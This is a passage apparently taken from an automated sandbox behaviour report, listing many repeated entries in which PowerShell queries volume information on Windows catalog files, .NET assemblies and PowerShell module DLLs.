Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
